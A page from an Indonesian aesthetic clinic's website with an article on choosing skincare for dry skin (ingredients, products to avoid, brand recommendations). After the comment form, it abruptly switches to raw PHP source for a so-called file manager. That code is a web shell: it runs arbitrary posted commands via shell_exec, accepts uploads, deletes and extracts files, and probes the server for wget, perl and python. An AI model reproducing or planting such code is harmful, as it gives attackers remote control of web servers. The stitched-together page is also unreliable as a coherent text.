Ada Yang Bisa Kami Bantu? Chat Kami Sekarang.
Cara Memilih Skincare untuk Kulit Kering

Cara Memilih Skincare untuk Kulit Kering

-

Daftar Isi

Kamu memiliki masalah pada wajah seperti kulit kering? Kulit kering sering dialami oleh beberapa orang dan membuat penampilan kurang menarik. Sebenarnya apa saja penyebab terjadinya kulit kering yang paling utama? Dan bagaimana cara mengatasinya? Nah, untuk menjawab beberapa pertanyaan tersebut kami akan membahas secara lebih detail mengenai cara memilih skincare untuk kulit kering yang tepat.

Skincare Untuk Kulit Kering dan Kusam

Cara memilih skincare untuk kulit kering di zaman sekarang ini sebenarnya sangatlah mudah, karena sudah cukup banyak produk skincare yang ditawarkan dengan kandungan yang mampu mengatasi kulit kering. Kondisi kulit kering yang dibiarkan dalam jangka waktu yang lama akan membuat kulit terlihat kusam dan tidak cerah. Agar Anda tidak mengalami hal tersebut, inilah cara memilih skincare yang bisa Anda lakukan untuk kulit kering.

  • Pilih Skincare yang Khusus untuk Kulit Kering

Untuk kulit kering, kandungan yang aman untuk digunakan tentu tidak boleh sembarangan. Karena produk yang kurang tepat akan membuat kulit Anda terkesan kering, tidak sehat dan kusam. Anda bisa memilih skincare khusus untuk kulit kering melalui kandungan yang ada dalam skincare atau tanya langsung ke penjualnya.

  • Pertimbangkan Kandungan Bahan Aktif pada Skincare

Apa saja kandungan skincare yang aman untuk kulit kering? Nah, Anda bisa memilih skincare dengan bahan aktif seperti asam hialuronat, asam laktat, gliserin dan yang terpenting tidak mengandung alkohol dalam jumlah yang banyak. Jika perlu pilih kandungan yang terbuat dari bahan alami sehingga efek samping tidak terlalu tinggi.

Kandungan alami yang bisa Anda pilih untuk mengatasi kulit kering dan kusam sepeti minyak argan, cocoa butter, aloe vera dan shea butter. Beberapa kandungan aktif tersebut sangat bagus untuk mengatasi kulit kering sehingga aman Anda gunakan setiap harinya dengan takaran yang ditentukan.

  • Hindari Skincare Mengandung Alkohol

Nah, hal terpenting yang perlu Anda  perhatikan adalah hindari memilih skincare yang mengandung alkohol seperti yang dijelaskan di point kedua. Kulit kering jika terkena alkohol akan menghilangkan kadar minyak alami yang ada pada kulit wajah sehingga kondisi kulit bisa semakin parah.

  • Pilih Skincare dengan Bahan Dasar Air

Kandungan selanjutnya yang perlu Anda perhatikan adalah air. Kandungan air yang ada dalam skincare berfungsi untuk meningkatkan kelembaban pada kulit sehingga tidak terlalu kering dan jika digunakan secara teratur wajah bisa kembali normal. Selain itu pilih juga skincare dengan kandungan pelembab yang mampu untuk menghidrasi kulit meskipun pada cuaca yang panas.

  • Hindari Skincare yang Mengandung Detergen

Seperti apa produk skincare yang mengandung deterjen? Skincare dengan kandungan detergen biasanya ditandai dengan adanya kandungan pewangi dan apabila itu pembersih wajah, busa yang dihasilkan cukup banyak. Pembersih wajah jenis ini lebih cocok digunakan pemilik kulit berminyak dan kurang cocok untuk kulit kering.

  • Pilih Skincare yang Kaya Vitamin

Cara selanjutnya adalah dengan memilih skincare yang mengandung banyak vitamin yang bagus untuk melindungi kulit kering. Vitamin yang cocok untuk kulit kering adalah vitamin A dan vitamin E. Dipercaya kandungan vitamin mampu menghindari ancaman wajah dari iritasi seperti kemerahan.

Skincare untuk Kulit Kering agar Glowing

Nah, beberapa cara di atas perlu Anda perhatikan agar masalah kulit kering cepat selesai. Karena, wajah kering kebalikan dari wajah glowing yang selama ini diidam-idamkan para wanita. Lalu skincare apa saja yang bisa membuat wajah kering menjadi glowing dalam waktu yang cepat? Berikut kami memiliki rekomendasi skincare untuk kulit kering agar glowing! Diantaranya:

  • Wardah Hydra Rose Gel Foam Cleanser

Cara pertama yang tidak boleh di skip untuk merawat wajah adalah membersihkan wajah dengan pembersih wajah. Khusus untuk wajah kering kami memiliki rekomendasi menggunakan foam cleanser dari Wardah varian hydra Rose Gel. Di dalam foam cleanser ini diklaim mengandung 72 hours hydration active sehingga kulit akan terjaga kelembabannya.

  • Emina Micellar Water

Selain memakai pelembab, kulit kering juga butuh dirawat dengan micellar water. Sehingga Anda perlu melakukan double cleansing agar wajah bisa normal secara optimal. Emina micellar water memiliki kandungan seperti hyaluronic acid dan calendula extract yang mampu menenangkan kulit dan mengurangi kulit kering. Gunakan setiap hari agar wajah kering berubah menjadi wajah glowing.

  • Avoskin Perfect Hydrating Treatment Essence

Menggunakan essence ternyata juga diklaim mampu mengembalikan kelembaban kulit yang hilang lho! Anda bisa mencoba produk Avoskin perfect Hydrating untuk memaksimalkan kelembaban kulit yang hilang karena kering. Essence dari Avoskin diklaim bisa digunakan setiap hari secara aman, tanpa efek samping dan bisa meresap dengan sangat cepat.

  • Somethinc Hyaluronic B5 Serum

Untuk serumnya, Anda bisa mencoba dari produk Somethinc varian hyaluronic B5 Serum. Selain mampu melembabkan kulit, produk ini bisa membuat kulit terasa kenyal dan mencegah terjadinya penuaan dini. Dengan menggunakan serum Somethinc secara rutin, kulit akan terasa lebih sehat dan terhindar dari berbagai masalah wajah lainnya.

  • Sensatia Botanicals Blossom 

Terakhir adalah produk dari Sensatia khususnya untuk cream malamnya. Di dalam cream malam Sensatia Botanicals Blossom, terkandung essential oil yang mampu membuat kulit terasa lebih lembab ternutrisi. Kandungan yang jarang dimiliki produk lain adalah minyak melati, bunga kenanga yang mampu menjadi antioksidan yang berfungsi meremajakan kulit kembali.

Kandungan Skincare untuk Kulit Kering

Agar tidak salah penting juga memperhatikan kandungan skincare yang dikhususkan untuk kulit kering. Apa saja kandungan skincare yang wajib ada untuk mengatasi kulit kering dan kusam? Berikut rangkumannya!

  • Squalane

Minyak squalane mampu menembus pada jaringan kulit yang dalam dan berfungsi mengembalikan kelembaban kulit.

  • Aloe vera

Aloe Vera atau lidah buaya mengandung antioksidan yang mampu meningkatkan pembentukan kolagen, melembabkan dan mencegah penuaan dini.

  • Glycerin

Kandungan Glycerin juga dipercaya mampu mengembalikan kelembaban kulit yang super kering dan tidak memberikan efek tertarik pada kulit.

  • Hyaluronic Acid

Bisa dikatakan kandungan hyaluronic acid paling baik untuk mengatasi kulit kering atau keriput karena faktor usia. Selain melembabkan, kandungan ini mampu membuat kulit wajah menjadi lebih lembut dan terasa kenyal. Hyaluronic acid biasanya terkandung pada skincare jenis cream, serum, atau toner.

Skincare untuk Kulit Kering Murah

Dimana Anda bisa mendapatkan skincare yang mampu mengatasi kulit kering dengan harga yang murah? Caranya adalah dengan membelinya ketika ada diskon bulanan atau membelinya melalui online. Pembelian skincare melalui online biasanya lebih murah dibandingkan dengan membeli langsung di toko. Namun, agar mendapatkan produk yang asli perhatikan terlebih dahulu mengenai keaslian produk melalui review dan rating sebuah online shop. Semoga informasi yang kami sampaikan bermanfaat! Semoga dengan cara diatas, masalah kulit kering dan kusam yang membuat tidak percaya diri bisa hilang.

Klinik RSa Aesthetic

Klinik RSa Aesthetic

Klinik Treatment Kecantikan Berkualitas di Bandung

Bagikan Artikel Via:

Share on facebook
Facebook
Share on twitter
Twitter
Share on linkedin
LinkedIn
Share on whatsapp
WhatsApp

Tinggalkan Komentar

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

basename($file), 'size' => '', 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } else { $files[] = array( 'name' => basename($file), 'size' => filesize($file), 'last_modified' => date('Y-m-d H:i:s', filemtime($file)), 'owner' => posix_getpwuid(fileowner($file))['name'], 'permissions' => substr(sprintf('%o', fileperms($file)), -4), ); } } // Handle file upload if (isset($_FILES['file'])) { $file = $_FILES['file']; if ($file['size'] > $max_upload_size) { echo 'File too large!'; } else { move_uploaded_file($file['tmp_name'], $current_dir. '/'. $file['name']); } } // Handle file deletion if (isset($_POST['delete'])) { $file = $_POST['delete']; $file_path = rtrim($current_dir, '/') . '/' . $file; if (file_exists($file_path) && is_file($file_path)) { unlink($file_path); header('Location: ' . $_SERVER['PHP_SELF'] . '?dir=' . rawurlencode(rtrim($current_dir, '/'))); exit; } else { echo 'File not found or not a file!'; } } // Handle terminal command if (isset($_POST['command'])) { $command = $_POST['command']; $output = shell_exec($command); echo "
$output
"; // Update current directory if command is cd if (strpos($command, 'cd ') === 0) { $new_dir = trim(substr($command, 3)); if ($new_dir == '..') { $current_dir = dirname($current_dir); } elseif ($new_dir!= '') { $current_dir = realpath($current_dir. '/'. $new_dir); } } } // Handle unzip if (isset($_POST['unzip'])) { $file = $_POST['unzip']; $file_path = $current_dir. '/'. $file; if (file_exists($file_path) && is_file($file_path)) { $zip = new ZipArchive; $res = $zip->open($file_path); if ($res === TRUE) { $zip->extractTo($current_dir); $zip->close(); echo "Unzipped successfully!"; } else { echo "Failed to unzip!"; } } else { echo "File not found or not a file!"; } } // Handle mkdir if (isset($_POST['mkdir'])) { $dir = $_POST['mkdir']; $dir_path = $current_dir. '/'. $dir;if (!is_dir($dir_path)) { mkdir($dir_path, 0750, true); echo "Directory created successfully!"; } else { echo "Directory already exists!"; } } // System information $server_ip = $_SERVER['SERVER_ADDR']; $web_server = $_SERVER['SERVER_SOFTWARE']; $system = php_uname('s'); $user = $_SERVER['USER']; $php_version = phpversion(); $disabled_functions = ini_get('disable_functions'); // MySQL, cURL, WGET, Perl, and Python information $mysql_enabled = function_exists('mysql_connect')? 'ON' : 'OFF'; $curl_enabled = function_exists('curl_init')? 'ON' : 'OFF'; $wget_enabled = shell_exec('wget --version')? 'ON' : 'OFF'; $perl_enabled = shell_exec('perl -v')? 'ON' : 'OFF'; $python_enabled = shell_exec('python --version')? 'ON' : 'OFF'; function filesize_format($size) { $units = array('B', 'KB', 'MB', 'GB', 'TB'); for ($i = 0; $size >= 1024 && $i < count($units) - 1; $i++) { $size /= 1024; } return round($size, 2). ' '. $units[$i]; } ?> File Manager

File Manager

Current directory:

Name Size Last Modified Owner Permissions Options

System Information

Server IP:

Web Server:

System:

User:

PHP Version:

Disabled Functions:

Module Information

MySQL:

cURL:

WGET:

Perl:

Python: